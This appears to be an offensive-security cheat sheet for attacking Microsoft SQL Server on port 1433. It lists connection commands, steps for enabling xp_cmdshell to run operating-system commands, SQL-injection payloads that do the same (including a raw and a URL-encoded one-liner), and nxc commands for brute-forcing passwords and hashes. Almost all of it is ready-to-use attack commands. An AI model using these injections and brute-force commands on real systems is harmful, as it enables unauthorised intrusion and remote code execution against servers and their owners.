TCP: MSSQL - 1433

Initial Connection

Connect on local machine

sqsh -S <Target IP Address> -U .\\<Username> -P <Password> -D <Database Name>

OR

impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -local-auth

Connect to machine

sqsh -S <Target IP Address> -U <Username> -P "<Password>"

OR

impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -windows-auth

Reverse Shell

On Machine

1. Initiate connection

If using sqsh, "GO" needs to be entered after every query to send it

1. Use the master databse

Use master

1. Get users that can run xp_cmdshell

EXEC sp_helprotect 'xp_cmdshell'

1. Check if xp_cmdshell is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

1. Enable advanced options as it is needed for xp_cmdshell

sp_configure 'show advanced options', '1'

1. Apply changes

RECONFIGURE

1. Enable xp_cmdshell

sp_configure 'xp_cmdshell', '1'

1. Apply changes

RECONFIGURE

1. Run command

EXEC xp_cmdshell '<Command to execute>'

On SQLi vulnerability

1. Enable advanced options as it is needed for xp_cmdshell

'; EXEC sp_configure "show advanced options", 1; -- //

1. Apply changes

'; RECONFIGURE -- //

1. Enable xp_cmdshell

'; EXEC sp_configure "xp_cmdshell", 1; -- //

1. Apply changes

'; RECONFIGURE -- //

1. Run commands

'; EXEC xp_cmdshell "<Command to execute>"; -- //

One Liner

Raw:

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "<Command to execute>"; -- //

URL Encoded:

%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22<Command to execute>%22%3B%20%2D%2D%20%2F%2F

Bruteforce

nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success

nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -H <Hash List> --continue-on-success